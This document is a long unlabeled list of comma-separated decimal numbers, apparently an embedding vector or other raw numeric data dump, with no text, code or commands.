0.00028515426674857736, 0.019766785204410553, -0.013918069191277027, -0.00794424582272768, -0.041222505271434784, -0.010782593861222267, -0.008405575528740883, -0.017733808606863022, -0.01904742419719696, 0.0017710351385176182, 0.008546319790184498, 0.02323848381638527, 0.004441271536052227, -0.011705252341926098, -0.025865714997053146, -0.014840727671980858, 0.00924222357571125, -0.006427332758903503, -0.0035968043375760317, 0.0006123363855294883, -0.010078871622681618, -0.01663913019001484, 0.04134761169552803, 0.01701444759964943, 0.019719870761036873, 0.01792146824300289, 0.016842426732182503, -0.011720891110599041, 0.04666462540626526, -0.020673805847764015, -0.0038001020438969135, -0.006345232017338276, 0.015231684781610966, -0.002570542274042964, 0.00857759639620781, 0.021659016609191895, 0.00952371209859848, 0.02861805260181427, 0.010766956023871899, -0.010321265086531639, -0.011595784686505795, -0.0034052354749292135, 0.023410504683852196, -0.0016205167630687356, -0.0043161651119589806, -0.007013768423348665, 0.007596294395625591, 0.02078327350318432, 0.010094509460031986, -0.011001530103385448, 0.017796361818909645, -0.04147271811962128, -0.026413055136799812, 0.00792078860104084, -0.010094509460031986, 0.0393146350979805, 0.040941014885902405, 0.0012999320169910789, 0.018703382462263107, 0.030901240184903145, -0.007889511995017529, -0.04272377863526344, -0.01979806274175644, -0.017280299216508865, 0.0002929733891505748, 0.019454019144177437, -0.009109297767281532, -0.012698283419013023, 0.012979771941900253, -0.0016107427654787898, 0.009109297767281532, -0.03305932506918907, 0.01820295676589012, 0.01593540795147419, -0.002685874467715621, 0.01701444759964943, -0.011439401656389236, 0.004816590342670679, 0.049291856586933136, -0.040753357112407684, 0.023973483592271805, -0.007217065896838903, -0.017077000811696053, 0.014379397965967655, 0.0010076916078105569, 0.021705932915210724, -0.03524868190288544, 0.004683664999902248, -0.030948156490921974, -0.039439741522073746, 0.01036817952990532, 0.011986741796135902, -0.012502804398536682, 0.00019486762175802141, 0.020517423748970032, 0.0008987123728729784, -0.006145843770354986, 0.004625021014362574, -0.009382967837154865, -0.005797892343252897, 0.011009348556399345, 0.0006817312678322196, -0.019782423973083496, 0.0025294916704297066, -0.017890192568302155, 0.02489614114165306, 0.007701852824538946, -0.000790710502769798, -0.0012276049237698317, -0.0038900221697986126, 0.028133265674114227, -0.031010707840323448, -0.007905150763690472, 0.014793812297284603, -0.011892911978065968, -0.0008478880045004189, -0.01494237594306469, -0.002470848150551319, -0.017499234527349472, -0.007858235388994217, 0.011275199241936207, -0.005950365215539932, -0.007654937915503979, -0.0000061888799791631754, 0.02644433081150055, 0.009594084694981575, 0.03659357503056526, 0.006435152143239975, -0.006016828119754791, 0.013667856343090534, -0.01593540795147419, 0.0012451980728656054, 0.017233384773135185, -0.03126092255115509, 0.00008961467392509803, 0.002373108873143792, -0.02625667117536068, -0.003262536134570837, -0.02007955126464367, -0.00028613166068680584, 0.0006309068412519991, 0.030338263139128685, -0.0058721741661429405, 0.024208057671785355, -0.009210946969687939, -0.002678055316209793, 0.006912119686603546, 0.0011240013409405947, 0.011705252341926098, 0.01706136390566826, 0.010743497870862484, -0.008045895025134087, 0.026178481057286263, -0.010806051082909107, 0.009797382168471813, -0.017952745780348778, -0.02885262668132782, -0.0034071900881826878, 0.009727009572088718, 0.021440081298351288, -0.029071561992168427, 0.0015178904868662357, -0.001979219727218151, 0.0071662417612969875, -0.025240182876586914, -0.00418323976919055, -0.0016205167630687356, 0.003063148120418191, 0.002193268621340394, 0.005864354781806469, -0.004253611899912357, -0.018077852204442024, -0.03233996406197548, -0.005696243606507778, 0.0045116436667740345, 0.022784974426031113, 0.014621791429817677, -0.022237634286284447, -0.005747067742049694, -0.0010076916078105569, -0.026976032182574272, -0.0020486146677285433, -0.009601904079318047, -0.020955294370651245, 0.007725310046225786, 0.01829678751528263, -0.01824987307190895, 0.006071561947464943, 0.010501104407012463, -0.021518273279070854, -0.06052014231681824, 0.04682100936770439, -0.016013598069548607, -0.006337413098663092, 0.02054869942367077, 0.00532874371856451, 0.020658167079091072, 0.030572837218642235, 0.006372598931193352, 0.02136188931763172, -0.015685195103287697, -0.007322624325752258, 0.011329934000968933, 0.0013996260240674019, 0.025255821645259857, -0.0421295240521431, -0.019641678780317307, -0.022800611332058907, 0.006990311201661825, -0.011580145917832851, -0.010430732741951942, -0.0010321264853700995, 0.007025497034192085, -0.026850925758481026, 0.008022437803447247, 0.01219003926962614, -0.024051673710346222, -0.04172293096780777, -0.022691143676638603, -0.00655243918299675, 0.0075689274817705154, -0.0002051302435575053, 0.011916369199752808, -0.015599183738231659, 0.00018423848086968064, 0.03409145027399063, 0.004351351410150528, 0.005621961783617735, 0.004847866948693991, 0.013050144538283348, 0.020142104476690292, 0.0047071222215890884, 0.020298486575484276, -0.029149753972887993, -0.02630358561873436, 0.040002718567848206, -0.03007241152226925, -0.02178412303328514, 0.021252421662211418, 0.005578956101089716, 0.0037121367640793324, 0.00496124429628253, -0.0031139724887907505, 0.010540200397372246, -0.012534081004559994, -0.014160462655127048, -0.01487200427800417, 0.0012364014983177185, -0.0027601562906056643, 0.01534897182136774, 0.002056433819234371, 0.02201869711279869, -0.01315179280936718, -0.014911099337041378, 0.002961499150842428, -0.0006284633418545127, -0.003966258838772774, -0.009234404191374779, -0.010055413469672203, 0.01815604232251644, -0.008866904303431511, -0.008475947193801403, 0.000940740283112973, -0.01018051989376545, 0.004320074804127216, -0.0014172190567478538, -0.038251232355833054, -0.004585925489664078, -0.009093659929931164, 0.027507733553647995, 0.034810811281204224, 0.016388917341828346, -0.02169029414653778, -0.0021404896397143602, -0.009656637907028198, 0.001677205553278327, 0.004277069587260485, -0.004699302837252617, -0.05063674971461296, 0.025678055360913277, -0.010164882056415081, -0.009828658774495125, 0.004167601466178894, -0.01402753684669733, 0.01663913019001484, -0.008992010727524757, -0.010117966681718826, 0.0486663281917572, -0.008483766578137875, 0.004011218901723623, 0.008100628852844238, -0.010985891334712505, -0.016435831785202026, -0.005485126748681068, 0.008906000293791294, -0.005254461895674467, -0.014926738105714321, 0.01064966805279255, 0.004218426067382097, 0.00808499101549387, -0.009375148452818394, -0.02763283997774124, 0.03559272363781929, -0.004933877382427454, -0.0062201255932450294, -0.0017114141955971718, 0.026241034269332886, -0.019203808158636093, -0.013120517134666443, -0.010141424834728241, -0.023222845047712326, -0.010485466569662094, 0.0036945436149835587, 0.012885942123830318, 0.002257776679471135, 0.00968791451305151, -0.01729593798518181, -0.025521673262119293, 0.009750467725098133, 0.009508074261248112, 0.012518443167209625, -0.015466258861124516, 0.0071779703721404076, 0.014371579512953758, -0.001477817422710359, 0.029212307184934616, 0.019313275814056396, 0.007725310046225786, 0.01513003557920456, -0.006771374959498644, -0.008147543296217918, -0.00034159867209382355, 0.013761686161160469, -0.03374740853905678, 0.00378250889480114, -0.005399116314947605, -0.009445521049201488, -0.00354793481528759, 0.019500935450196266, -0.020705081522464752, 0.014746897853910923, 0.024020398035645485, 0.004941696301102638, -0.004492095671594143, 0.01843753270804882, -0.009859935380518436, -0.013331633061170578, 0.007439911365509033, -0.0014113547513261437, -0.01692061871290207, 0.006032466422766447, 0.01785891503095627, -0.004597654100507498, -0.010571477003395557, 0.019970083609223366, -0.026053374633193016, 0.028602413833141327, -0.01668604463338852, 0.005907359998673201, 0.01867210678756237, -0.007643209304660559, 0.0017456229543313384, -0.0004671936039812863, -0.0257406085729599, 0.0243331640958786, -0.012127486057579517, 0.011173550970852375, -0.014793812297284603, 0.0020232023671269417, 0.011986741796135902, -0.017030086368322372, -0.015575726516544819, -0.015849396586418152, 0.02054869942367077, 0.002865714719519019, -0.0012901581358164549, 0.003931072540581226, -0.007772224955260754, -0.017796361818909645, 0.05351419374346733, 0.011634879745543003, 0.001589240157045424, 0.004769675433635712, 0.019125616177916527, -0.01965731754899025, 0.007748767733573914, -0.00733044371008873, 0.0013575981138274074, 0.0016498385230079293, -0.0029360870830714703, 0.01806221343576908, 0.028023798018693924, 0.010618392378091812, 0.017421044409275055, -0.0021346251014620066, 0.00025070118135772645, 0.018468808382749557, -0.025052523240447044, 0.013136154972016811, 0.008038075640797615, -0.005535950884222984, 0.0007726287585683167, 0.012580996379256248, -0.009805201552808285, 0.02735135145485401, -0.008921638131141663, 0.009382967837154865, -0.0027171510737389326, -0.0016596124041825533, -0.0021854497026652098, -0.02017338015139103, 0.003372004022821784, -0.019454019144177437, 0.0077995918691158295, 0.005234914366155863, 0.01064966805279255, 0.005911269690841436, -0.01011014822870493, -0.0017387812258675694, 0.002668281551450491, 0.004765765741467476, -0.010329083539545536, -0.021565187722444534, -0.0049260579980909824, -0.014019717462360859, -0.00735390093177557, -0.009953765198588371, -0.008655787445604801, 0.006294407416135073, 0.008561958558857441, 0.009828658774495125, -0.009281318634748459, -0.005743158049881458, -0.00968791451305151, 0.011455039493739605, -0.007240523584187031, 0.0023691994138062, 0.0004928501439280808, 0.0003091003745794296, -0.01564609818160534, -0.005559408571571112, -0.02894645556807518, -0.013761686161160469, 0.001295045018196106, -0.016232535243034363, -0.010501104407012463, -0.014340302906930447, -0.024927418678998947, -0.011470678262412548, 0.005535950884222984, -0.009813020937144756, 0.002287098439410329, 0.007694033440202475, -0.0039408463053405285, -0.0090076494961977, -0.005000339820981026, 0.00575097743421793, 0.01932891458272934, 0.01918816938996315, 0.005363930016756058, -0.004363080020993948, 0.011408125050365925, -0.004742308519780636, -0.021236784756183624, 0.005559408571571112, 0.005012068431824446, -0.002085755579173565, 0.00035308304359205067, -0.007287438493221998, 0.015286418609321117, 0.0034247832372784615, 0.00178276386577636, 0.020048273727297783, 0.002384837716817856, 0.03624953329563141, 0.007334353402256966, -0.03287166357040405, -0.024036036804318428, -0.014183919876813889, -0.0023144653532654047, 0.012158762663602829, -0.0014348122058436275, -0.030400816351175308, 0.003069012425839901, 0.008937276899814606, -0.0055750468745827675, -0.03215230256319046, 0.010438552126288414, -0.017999660223722458, 0.012010199017822742, -0.007729219738394022, -0.010727860033512115, -0.0009461159352213144, 0.022284548729658127, -0.021909229457378387, 0.001384965144097805, -0.01011014822870493, -0.010938976891338825, -0.0055867754854261875, 0.011517592705786228, 0.05220057815313339, 0.0020310215186327696, -0.021518273279070854, -0.015489716082811356, 0.006935576908290386, -0.023770185187458992, 0.00813190545886755, 0.016107428818941116, -0.004077681340277195, 0.008640149608254433, 0.02342614345252514, -0.0006880842847749591, -0.00792078860104084, -0.027038585394620895, 0.0176712553948164, -0.013957164250314236, -0.005555498879402876, -0.004628930706530809, 0.009296957403421402, 0.0012999320169910789, 0.01815604232251644, -0.004402175545692444, 0.015474078245460987, 0.0031491585541516542, 0.018922317773103714, 0.030322624370455742, 0.016326364129781723, 0.009766105562448502, 0.00834302231669426, 0.021815400570631027, -0.010422913357615471, 0.012143123894929886, -0.013042325153946877, -0.017718171700835228, -0.005891721695661545, -0.0320584736764431, 0.005336563102900982, 0.011619241908192635, -0.003461924148723483, 0.0022382286842912436, -0.003295767353847623, 0.006032466422766447, 0.01677987352013588, -0.01086860429495573, 0.0034032806288450956, 0.013691313564777374, -0.0040073092095553875, 0.010243073105812073, -0.013949345797300339, -0.010931157507002354, -0.025678055360913277, -0.032652728259563446, -0.009891211986541748, 0.015520992688834667, 0.008585415780544281, 0.004593744874000549, 0.0010467873653396964, 0.009328234009444714, 0.007170151453465223, 0.020908379927277565, 0.005309196189045906, 0.0018101308960467577, 0.01815604232251644, 0.005344382021576166, -0.004179330077022314, 0.024489546194672585, 0.015364609658718109, 0.02239401638507843, -0.005258371587842703, -0.007310895714908838, -0.0008825854165479541, -0.021909229457378387, -0.010899880900979042, 0.010735679417848587, 0.008217915892601013, 0.010524562560021877, -0.011423763819038868, 0.0036984530743211508, -0.010039775632321835, -0.000992053421214223, 0.00022370069928001612, -0.0011845997069031, 0.0049260579980909824, -0.021377528086304665, -0.0036319904029369354, -0.009156213141977787, 0.009797382168471813, 0.009680095128715038, -0.004605473484843969, -0.023582525551319122, 0.00009767815936356783, 0.021111678332090378, 0.011017167940735817, 0.013253442011773586, -0.016326364129781723, -0.008460309356451035, 0.011603603139519691, 0.005332653410732746, -0.01419173926115036, 0.005813530646264553, -0.015036205761134624, -0.007013768423348665, -0.00023139767290558666, -0.006192758679389954, 0.019313275814056396, -0.004484276752918959, 0.019923169165849686, 0.0050042495131492615, 0.014144823886454105, 0.018969234079122543, -0.0015706697013229132, -0.02309773862361908, 0.004402175545692444, -0.018093489110469818, -0.024692844599485397, 0.02649124525487423, 0.00862451083958149, -0.025537310168147087, -0.004284888505935669, -0.0088356276974082, 0.00831956509500742, -0.021236784756183624, -0.00339350663125515, 0.013159612193703651, 0.033121876418590546, 0.006384327542036772, 0.020517423748970032, 0.004664117004722357, -0.000024297365598613396, -0.0038235594984143972, -0.01687370426952839, -0.0052075469866395, -0.004757946822792292, -0.0018990735989063978, 0.0184844471514225, 0.01668604463338852, 0.003852881258353591, 0.0002580316213425249, -0.005285738501697779, 0.004081591032445431, -0.011822539381682873, 0.0031002890318632126, -0.019532211124897003, 0.007091959938406944, -0.009578445926308632, 0.012479347176849842, 0.004484276752918959, 0.007357810623943806, 0.0034990650601685047, -0.009813020937144756, 0.00476185604929924, -0.00573924882337451, -0.010594934225082397, -0.012807751074433327, 0.019876252859830856, 0.00632959371432662, -0.0016977307386696339, 0.006548529490828514, 0.011627061292529106, 0.017233384773135185, -0.0042145163752138615, -0.025474756956100464, -0.02220635674893856, -0.009343871846795082, -0.011024987325072289, 0.010688764043152332, 0.02267550490796566, 0.008718340657651424, 0.016420193016529083, -0.015309875831007957, 0.026475608348846436, -0.018640829250216484, -0.012025836855173111, 0.027695393189787865, 0.0042262449860572815, 0.009445521049201488, 0.014137004502117634, 0.021205507218837738, 0.0076041133143007755, 0.012049295008182526, -0.003934982232749462, -0.0031296107918024063, 0.03083868697285652, -0.03756314888596535, 0.0044999150559306145, -0.00004276092295185663, -0.009398605674505234, -0.006916029378771782, 0.01692061871290207, -0.0005502719432115555, 0.015505353920161724, 0.021096039563417435, 0.0045116436667740345, 0.0009451385121792555, -0.005723610520362854, -0.0026311406400054693, -0.017561787739396095, 0.015966683626174927, 0.008327383548021317, 0.001296022441238165, -0.009562808088958263, 0.021909229457378387, 0.034154001623392105, 0.005074621643871069, -0.019360190257430077, 0.009773924946784973, -0.005324834026396275, -0.0146843446418643, 0.0329967699944973, -0.0036222166381776333, -0.03138602897524834, 0.0023183750454336405, 0.0006245538243092597, 0.006122386548668146, 0.01192418858408928, 0.004636750090867281, -0.00033353519393131137, -0.0001565049751661718, -0.004793132655322552, -0.004863504786044359, 0.01353493146598339, -0.015208226628601551, 0.02108040079474449, -0.00009700620285002515, -0.02918102964758873, -0.004593744874000549, 0.005113717634230852, -0.020767634734511375, 0.007252252195030451, 0.0025236273650079966, 0.002312510507181287, -0.02093965746462345, -0.011580145917832851, 0.009132754988968372, -0.00808499101549387, 0.008296106941998005, 0.008859085850417614, 0.004101139027625322, 0.020298486575484276, 0.00530528649687767, -0.007017678115516901, -0.006489885970950127, -0.0007359765586443245, 0.008976372890174389, 0.011939826421439648, 0.01513003557920456, 0.007955974899232388, -0.001780809136107564, 0.02711677737534046, -0.011064083315432072, -0.004883052781224251, 0.0013468468096107244, -0.013402005657553673, -0.0041480534709990025, 0.041285060346126556, 0.026147203519940376, 0.02391093038022518, 0.004675845615565777, -0.00004737299241241999, 0.02078327350318432, -0.013488016091287136, -0.014324664138257504, -0.007502464577555656, -0.017467958852648735, -0.0017270524986088276, -0.005602413788437843, 0.011384667828679085, -0.014832908287644386, -0.0029204487800598145, -0.014582695439457893, 0.00009046988998306915, 0.0007066547404974699, -0.01640455611050129, 0.0032156212255358696, 0.0009309663437306881, 0.025709331035614014, -0.010907700285315514, -0.008859085850417614, -0.003979942295700312, -0.01876593567430973, -0.016858065500855446, -0.016701683402061462, 0.005066802725195885, 0.012432432733476162, -0.013175250962376595, 0.012315145693719387, 0.0013136154739186168, 0.034529320895671844, -0.004613292403519154, 0.029071561992168427, -0.01753051206469536, -0.025334013625979424, 0.005074621643871069, 0.0050824410282075405, -0.0010692673968151212, -0.02635050192475319, -0.0015638279728591442, 0.01738976687192917, 0.009422063827514648, 0.010383817367255688, -0.02262859046459198, -0.0172021072357893, 0.015513173304498196, 0.01282338984310627, -0.009093659929931164, 0.006145843770354986, 0.009992861188948154, 0.0025079890619963408, 0.008053714409470558, 0.010258711874485016, -0.018124766647815704, -0.01039163675159216, -0.012440251186490059, 0.019735509529709816, 0.016842426732182503, 0.009953765198588371, -0.0057822540402412415, 0.028883902356028557, -0.0043044365011155605, 0.002283188747242093, -0.003461924148723483, 0.0023926568683236837, -0.025380928069353104, -0.014090090058743954, -0.026850925758481026, 0.008217915892601013, 0.004120686557143927, 0.011619241908192635, -0.01928199827671051, 0.012815570458769798, -0.01668604463338852, -0.00177689956035465, -0.04860377311706543, 0.003594849491491914, -0.002564677968621254, -0.0135740265250206, 0.004366989713162184, -0.024583375081419945, 0.006063743028789759, 0.0032371238339692354, 0.00755328917875886, -0.00029688296490348876, 0.010712221264839172, -0.008491585962474346, 0.005946455989032984, -0.004648478701710701, -0.011486316099762917, -0.015145674347877502, -0.0008752549765631557, -0.010313445702195168, 0.004781404044479132, -0.0011552779469639063, 0.033591024577617645, 0.008483766578137875, -0.00907802116125822, -0.027460819110274315, -0.008726160041987896, 0.03240251541137695, 0.008257011882960796, 0.01242461334913969, 0.010829508304595947, -0.014481047168374062, -0.02291007898747921, 0.016138704493641853, -0.02079891227185726, -0.006556348875164986, 0.017546148970723152, 0.01131429523229599, 0.0047071222215890884, 0.03355974704027176, -0.01843753270804882, 0.0017583291046321392, 0.030823050066828728, -0.011642699129879475, -0.0012500849552452564, -0.01696753315627575, -0.04550739377737045, 0.0011406170669943094, 0.007424273528158665, 0.010071052238345146, -0.0198918916285038, -0.006251402199268341, -0.0007677418179810047, -0.0244582686573267, -0.009445521049201488, -0.012839027680456638, 0.012573176994919777, 0.014911099337041378, -0.0015491670928895473, -0.018875403329730034, 0.016295086592435837, 0.010063232854008675, 0.020235933363437653, -0.02225327119231224, -0.005770525429397821, -0.007717491127550602, -0.013253442011773586, 0.009375148452818394, 0.0014524052385240793, -0.0021561277098953724, -0.00992248859256506, 0.01352711208164692, -0.017405405640602112, -0.02103348635137081, 0.02871188148856163, -0.013910249806940556, -0.0005541815189644694, -0.022878803312778473, 0.011361210606992245, -0.0137460483238101, -0.021236784756183624, 0.008507223799824715, 0.005758796352893114, 0.016295086592435837, -0.0094767976552248, 0.016420193016529083, 0.00023298592714127153, -0.004363080020993948, -0.02960326336324215, -0.009750467725098133, -0.005258371587842703, -0.02337922900915146, -0.0037297296803444624, 0.010031956247985363, -0.00041099352529272437, 0.011658337898552418, 0.008006799034774303, 0.00756501778960228, 0.00008216205606004223, -0.016326364129781723, -0.0036945436149835587, 0.0057822540402412415, 0.010548019781708717, -0.011017167940735817, -0.0038196498062461615, 0.002777749439701438, 0.003469743300229311, -0.006474247667938471, -0.009015467949211597, -0.013370729051530361, 0.0004373831325210631, -0.015896311029791832, -0.01068094465881586, 0.0031393845565617085, -0.0006020737928338349, -0.015505353920161724, 0.008898180909454823, -0.00419496838003397, 0.0028266189619898796, 0.012768655084073544, 0.002378973411396146, 0.017264660447835922, 0.004832228645682335, 0.0008576618856750429, -0.011142274364829063, -0.02447390742599964, -0.0071662417612969875, 0.00044398053432814777, 0.01011014822870493, 0.0015100713353604078, -0.03459187597036362, 0.032590173184871674, -0.011728709563612938, 0.005109807942062616, 0.0017270524986088276, -0.0009725055424496531, -0.020705081522464752, 0.004249702673405409, 0.007826958782970905, -0.016373278573155403, 0.013660036958754063, -0.016201257705688477, 0.019782423973083496, -0.005383478011935949, -0.02136188931763172, 0.006184939760714769, 0.03531123697757721, -0.008655787445604801, 0.02782049961388111, 0.0011103178840130568, -0.009296957403421402, 0.009625361301004887, 0.008945096284151077, 0.018265509977936745, -0.0037258202210068703, 0.01449668500572443, 0.005360020324587822, -0.005813530646264553, 0.0031159273348748684, -0.0009070202358998358, 0.002957589691504836, -0.013112697750329971, -0.01221349649131298, -0.0018345656571909785, 0.025396566838026047, -0.023832738399505615, 0.007244433276355267, 0.0012657232582569122, 0.0024122046306729317, 0.03280911222100258, 0.009148393757641315, 0.012268230319023132, 0.009203127585351467, -0.01326908078044653, -0.0021346251014620066, 0.0016713411314412951, -0.002402430633082986, -0.001985084032639861, 0.017702532932162285, -0.0011464813724160194, 0.0022225906141102314, -0.01792146824300289, -0.005891721695661545, -0.01103280670940876, -0.004234064370393753, -0.012979771941900253, 0.047634199261665344, 0.002181540010496974, -0.00014550930063705891, -0.0057822540402412415, -0.0334659181535244, 0.009070202708244324, 0.013308175839483738, -0.02805507369339466, 0.01400407962501049, -0.02498997189104557, 0.0009549124515615404, 0.013597484678030014, -0.003581166034564376, -0.01223695371299982, -0.006032466422766447, -0.005414754152297974, -0.020705081522464752, 0.017280299216508865, -0.02833656221628189, 0.005414754152297974, 0.000006769206720491638, -0.009531531482934952, 0.004910419695079327, -0.026006458327174187, -0.011009348556399345, -0.0010546065168455243, -0.001187531859613955, 0.029681455343961716, -0.019031787291169167, -0.004034676123410463, 0.010774774476885796, -0.0019352370873093605, 0.016201257705688477, -0.00043933792039752007, 0.002269505290314555, -0.013706952333450317, 0.014230834320187569, 0.0026115926448255777, -0.008436852134764194, 0.0011933962814509869, 0.008053714409470558, -0.002148308791220188, 0.010438552126288414, -0.023488696664571762, -0.01082168985158205, 0.001779831713065505, 0.009554988704621792, -0.000018768989320960827, -0.011572327464818954, 0.005246642976999283, -0.012346422299742699, 0.014739078469574451, -0.025302736088633537, 0.020908379927277565, 0.00714278407394886, 0.018281148746609688, -0.0040307664312422276, -0.01984497718513012, -0.003860700409859419, 0.008671426214277744, 0.009117117151618004, -0.025959543883800507, -0.02239401638507843, 0.018187319859862328, 0.005262281280010939, -0.026413055136799812, -0.006986401509493589, -0.00635305093601346, -0.006614992395043373, 0.002089665038511157, -0.0047305794432759285, 0.00996940303593874, 0.007389087229967117, -0.015176950953900814, 0.006204487290233374, 0.02054869942367077, 0.02946251817047596, 0.01150195486843586, 0.005594594404101372, 0.0020407955162227154, -0.010141424834728241, 0.016858065500855446, -0.0017270524986088276, 0.004953424911946058, -0.0018199047772213817, -0.007072411943227053, 0.024599013850092888, -0.014379397965967655, 0.004155872855335474, -0.004323984496295452, -0.006974672898650169, 0.009210946969687939, -0.014355940744280815, 0.00596209429204464, 0.009038926102221012, 0.00736562954261899, 0.013112697750329971, 0.0075767464004457, -0.02395784482359886, -0.012620091438293457, 0.0005111762438900769, 0.01268264465034008, 0.00021759200899396092, -0.0011376847978681326, -0.030479006469249725, -0.001584353274665773, -0.0015677375486120582, 0.01473125908523798, -0.005144994240254164, -0.002072072122246027, -0.0020173380617052317, 0.009648818522691727, 0.009304776787757874, 0.005637599620968103, 0.024599013850092888, 0.0006831973441876471, 0.006904300302267075, 0.00767448591068387, 0.0015423253644257784, -0.008202278055250645, 0.0019420788157731295, -0.0042809792794287205, -0.01635763980448246, 0.034435492008924484, -0.02178412303328514, -0.013355091214179993, -0.003587030339986086, 0.009891211986541748, -0.008139724843204021, 0.005864354781806469, 0.010149243287742138, -0.016373278573155403, 0.0036964984610676765, 0.020970933139324188, 0.0019176440546289086, 0.021377528086304665, -0.0016635219799354672, -0.021659016609191895, -0.023926567286252975, -0.014441951178014278, -0.002756246831268072, -0.027742307633161545, -0.006501614581793547, 0.003946710843592882, -0.01494237594306469, -0.009195308201014996, 0.01147849764674902, -0.01084514707326889, 0.01564609818160534, 0.011533231474459171, 0.011681795120239258, -0.008358660154044628, -0.009727009572088718, 0.0008063488057814538, 0.0194227434694767, -0.007181880064308643, -0.004003399517387152, 0.007596294395625591, -0.007600204087793827, 0.005117626860737801, 0.004058133810758591, 0.01494237594306469, -0.010266530327498913, -0.023691993206739426, -0.010000679641962051, -0.03315315395593643, -0.007561108097434044, 0.014645248651504517, -0.010250892490148544, 0.012338602915406227, -0.012807751074433327, -0.0022049974650144577, -0.0063647800125181675, 0.012557538226246834, -0.019829338416457176, -0.015278599224984646, 0.014246473088860512, 0.017483597621321678, 0.015044025145471096, -0.00855413917452097, -0.006998130120337009, 0.0068925716914236546, 0.03051028400659561, 0.005844807252287865, -0.0069473059847950935, 0.023363590240478516, -0.012776474468410015, 0.02644433081150055, 0.00834302231669426, 0.003070967271924019, 0.00338764232583344, -0.015012748539447784, -0.0005492945783771574, -0.011838178150355816, -0.001882457872852683, 0.014793812297284603, 0.016607852652668953, -0.019297637045383453, 0.017765086144208908, -0.005758796352893114, 0.0024161143228411674, 0.004089409951120615, 0.020611252635717392, 0.024411354213953018, 0.002312510507181287, -0.010985891334712505, -0.02475539594888687, -0.006396056618541479, 0.028227094560861588, -0.00921876635402441, 0.0032938127405941486, -0.004757946822792292, 0.014348121359944344, 0.00711932685226202, -0.011916369199752808, 0.0015980367315933108, -0.0018648648401722312, -0.015669556334614754, -0.0031237464863806963, -0.0003134986327495426, 0.010094509460031986, -0.005098079331219196, -0.010501104407012463, -0.018969234079122543, 0.011251742020249367, -0.005391296930611134, 0.005512493662536144, 0.005856535863131285, -0.029775284230709076, -0.04444399103522301, -0.00220890692435205, -0.015434982255101204, 0.005297467112541199, -0.004398266319185495, 0.008030256256461143, -0.009062383323907852, -0.0053131054155528545, 0.004765765741467476, -0.02356688678264618, 0.027210606262087822, 0.015341152437031269, -0.00046792664215900004, 0.009281318634748459, -0.010852966457605362, -0.0009549124515615404, 0.026788372546434402, -0.004261431284248829, 0.051512494683265686, 0.02489614114165306, -0.017608702182769775, 0.021393166854977608, -0.012878123670816422, -0.008882543072104454, 0.004413904622197151, 0.0035088390577584505, -0.00023860593501012772, 0.010993710719048977, -0.011369029060006142, 0.023035185411572456, -0.009429882280528545, 0.008726160041987896, 0.00047696754336357117, -0.007866054773330688, 0.007275709882378578, 0.0077995918691158295, -0.007705762516707182, -0.010978071950376034, -0.0008229644736275077, -0.005137174855917692, -0.03502974659204483, 0.009508074261248112, -0.0017338942270725965, -0.0005360997747629881, -0.0013087285915389657, -0.00476185604929924, 0.01539588626474142, -0.009422063827514648, 0.004957334604114294, -0.007322624325752258, 0.0006323729176074266, -0.005821349564939737, -0.0027249702252447605, -0.005778344348073006, 0.0022225906141102314, 0.011228284798562527, 0.008655787445604801, -0.011306475847959518, -0.002506034215912223, 0.012104028835892677, -0.0001424549554940313, -0.0005434302147477865, -0.017999660223722458, -0.009296957403421402, 0.007193608675152063, -0.02370763197541237, -0.002949770539999008, -0.0212993361055851, -0.003843107260763645, 0.015458439476788044, -0.02050178498029709, -0.0049925209023058414, -0.01876593567430973, -0.019641678780317307, -0.0028442121110856533, -0.012487166561186314, 0.0033915520180016756, -0.004288798198103905, -0.000005024408437748207, 0.007392996922135353, -0.0094767976552248, -0.002298827050253749, 0.009719191119074821, 0.010993710719048977, 0.024786673486232758, -0.03653101995587349, -0.007764406036585569, 0.00530528649687767, -0.006380418315529823, -0.010876423679292202, 0.010532381013035774, 0.0126357302069664, 0.015779023990035057, -0.03324698284268379, -0.024958694353699684, 0.012549719773232937, -0.021471358835697174, -0.023770185187458992, -0.02442699298262596, 0.00733044371008873, 0.009375148452818394, -0.021393166854977608, 0.015911949798464775, -0.013464558869600296, 0.003669131314381957, 0.017311574891209602, 0.01635763980448246, 0.012580996379256248, -0.0003225395339541137, 0.010008499026298523, 0.017733808606863022, 0.020063912495970726, 0.0075767464004457, -0.005066802725195885, 0.0010340812150388956, -0.0076588476076722145, 0.005098079331219196, 0.0006211329018697143, 0.0010213751811534166, -0.000020754318029503338, 0.01312833558768034, -0.00831956509500742, -0.016701683402061462, 0.002779704285785556, -0.007150603458285332, -0.007115417160093784, -0.008350841701030731, 0.004363080020993948, 0.011369029060006142, 0.005571137182414532, 0.010626210831105709, -0.001368349534459412, -0.004828318953514099, 0.003690633922815323, 0.017843276262283325, 0.0026135474909096956, 0.01810912787914276, 0.005813530646264553, -0.0017192333471029997, 0.0043044365011155605, 0.009766105562448502, -0.011017167940735817, 0.0119945602491498, 0.00450382474809885, -0.006122386548668146, -0.002050569513812661, 0.0025177630595862865, -0.010485466569662094, 0.003368094563484192, -0.008124086074531078, 0.019766785204410553, 0.006349141709506512, 0.016232535243034363, -0.016467109322547913, -0.01937582902610302, 0.012096209451556206, 0.01616998203098774, -0.007869964465498924, -0.017999660223722458, 0.003569437423720956, -0.012588814832270145, -0.0035225225146859884, -0.006212306674569845, 0.006372598931193352, 0.011048444546759129, -0.014778174459934235, -0.016607852652668953, -0.01154886931180954, -0.03126092255115509, 0.007733129430562258, 0.02658507600426674, 0.027460819110274315, 0.00688475277274847, 0.017030086368322372, 0.01261227298527956, -0.005238823592662811, 0.0023496514186263084, -0.02031412534415722, 0.01659221388399601, -0.002312510507181287, -0.010462009347975254, 0.01381641998887062, 0.011376848444342613, -0.006638449616730213, 0.002492350758984685, -0.027022946625947952, -0.0005590685177594423, 0.002474757842719555, 0.013832058757543564, 0.007428182754665613, -0.011853815987706184, 0.005688424222171307, -0.003067057579755783, 0.021393166854977608, -0.002056433819234371, -0.007654937915503979, 0.016420193016529083, 0.012494985945522785, 0.0045781065709888935, 0.016060512512922287, -0.0033895971719175577, 0.004140234552323818, 0.002576406579464674, 0.025255821645259857, -0.0021170321851968765, -0.006728369742631912, 0.010751317255198956, 0.01904742419719696, -0.027194969356060028, 0.007998979650437832, 0.0030103689059615135, 0.018077852204442024, -0.028117626905441284, 0.0057822540402412415, 0.015223865397274494, 0.0038274689577519894, -0.01426211092621088, -0.024927418678998947, 0.01268264465034008, 0.0027464728336781263, 0.0017417133785784245, -0.004703212529420853, 0.023629439994692802, -0.018703382462263107, -0.009109297767281532, 0.0004522883682511747, 0.010860784910619259, 0.020486146211624146, 